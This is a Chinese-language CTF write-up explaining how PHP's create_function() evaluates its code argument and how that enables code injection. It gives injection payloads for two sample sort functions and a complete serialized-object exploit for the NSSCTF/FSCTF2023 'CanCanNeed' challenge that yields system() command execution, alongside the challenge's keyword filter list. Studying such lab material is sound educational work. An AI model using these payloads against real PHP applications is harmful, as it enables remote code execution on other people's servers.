php代码之create_function()函数

NSS上随机到的一道看题目没什么思路，搜wp看到用到create_function()函数，搜索了解了一下。

create_function()简介

适用 PHP4>4.0.1 PHP 5 PHP7

语法：

create_function(string $args,  string $code)

string $args 声明的函数变量部分

string $code 执行的方法代码部分

函数功能：

<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc\n";
echo $newfunc(2, M_E) . "\n";
?>

分析：

create_function() 会创造一个匿名函数 (lambda样式) 此处创建了一个叫 lamvda_1 的函数， 在第一个 echo 中 显示名字， 并在第二个echo 语句中执行了 此函数。

create_function() 函数 会在内部 执行 eval() , 我们发现是执行了 后面的 return 语句，属于create_function() 中的第二个参数 string $code 的位置

因此，上述匿名函数的创建与执行过程等价于：

<?php
function lambda_1($a,$b){
    return "ln($a) + ln($b) = " . log($a * $b);
}
?>

代码注入实例

0x01

<?php
error_reporting(0);
$sort_by = $_GET['sort_by'];
$sorter = 'strnatcasecmp';
$databases=array('1234','4321');
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
usort($databases, create_function('$a, $b', $sort_function));
?>

简单看一下php代码，要传入一个GET参数赋值给$sort_by。然后定义$sorter的值是 'strnatcasecmp',这是PHP 的内置比较函数，用于自然排序、忽略大小写。比如传入image1和image10时，他会按照数序大小排列。

之后定义了一个数组，注意这个数字不含键值对，但是后面的代码会假设他是一个“有键的数组”。

在$sort_function部分会通过拼接生成字符串。比如我们输入值为name，就会得到：

return 1 * strnatcasecmp($a["name"], $b["name"]);

但是如果我们传入恶意参数，比如

?sort_by=a"]);phpinfo();// 

那最终拼接的字符串就变成：

return 1 * strnatcasecmp($a["a"]);phpinfo();//"], $b["a"]);phpinfo();//"]);

PHP 会把这段代码交给 create_function 去执行（也就是usort一行），于是这段拼接的字符串被直接“注入”到了函数体里，造成任意代码执行漏洞。

usort($databases, create_function('$a, $b', $sort_function));

上面提到，create_function() 会把第二个参数当作 PHP 代码编译成匿名函数。

也就是说，用户可控的 $sort_function 直接被当成php执行。

0x02

<?php
$c=$_GET['c'];
$lambda=create_function('$a,$b',"return (strlen($a)-strlen($b)+" . "strlen($c));");
$array=array('reall long string here,boy','this','midding lenth','larget');
usort($array,$lambda);
print_r($array);
?>

我们可以看到，$lambda一行,排序构造部分(也就是之后要生成的匿名函数部分中$c是我们可控的)，

payload:

?c=1));}phpinfo();/*

0x03(NSSCTF CanCanNeed )

point:反序列化 creat_function函数

<?php
class Noteasy{
    protected $param1;
    protected $param2;
    
    function __destruct(){
        $a=$this->param1;
        $b=$this->param2;
        if(preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\*|\||\<|\"|\'|\=|\?|sou|\.|log|scan|chr|local|sess|b2|id|show|cont|high|reverse|flip|rand|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|y2f/i', $this->param2)) { 
            die('this param is error!'); 
        } else { 
            $a('', $b); 
        }
    }
    
}
if (!isset($_GET['file'])){    
    show_source('index.php');
    echo "Hi!Welcome to FSCTF2023!";
  }
  else{ 
    $file=base64_decode($_GET['file']); 
    unserialize($file); }
?>
Hi!Welcome to FSCTF2023!

分析源代码，我们需要传入一个GET型参数file，参数经过base64解码之后赋值给$file,然后进行反序列化。反序列化过程会触发__destruct()魔术方法，这个魔术方法把$param1赋值给$a,$param2经过过滤之后赋值给$b,之后$a('', $b);

$a('', $b);:

$a 此时是个“可调用”（callable）：通常是函数名的字符串、匿名函数（Closure），或者 [$obj, 'method'] 这样的数组。

'' 是传给这个可调用的第一个参数（一个空字符串字面量）。

$b 是第二个参数，值来自上面 $b = $this->param2;。

wp中用到的思路是$param1= "create_function"; $param2="};system(\$_POST[cmd]);//"

通过反序列化实现赋值再通过creat_function匿名函数执行$param2的php代码。

<?php 
    class Noteasy{
    protected $param1= "create_function"; 
    protected $param2="};system(\$_POST[cmd]);//"; } 
	$a= new Noteasy(); 
	echo base64_encode(serialize($a));
?>

解释一下$param2中{ 的作用：

create_function($args, $code) 内部会 eval 一段模板代码，类似：

eval("function $lambda($args) { $code }");

所以第二个参数是用来闭合create_function() 生成的函数体的大括号 {。

references

PHP代码 之create_function()函数_create function-CSDN博客

[NSSCTF第15页（3）_fsctf 2023]cancanneed-CSDN博客